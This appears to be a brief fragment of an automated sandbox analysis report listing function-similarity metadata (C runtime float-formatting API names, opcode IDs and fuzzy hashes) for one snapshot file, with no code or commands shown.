                                                                                                                          • Snapshot File: hcaresult_7_2_40b000_daersgt.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3016257755-0
                                                                                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                          • Instruction ID: e950241f73d42944cd710210a14d6297da0e762eb9f253b78aae5045d500f0ca
                                                                                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                          • Instruction Fuzzy Hash: 5511723210014ABBCF229E84CC418EE3F26BB58354B188436FE1864971D33AC9B5AF85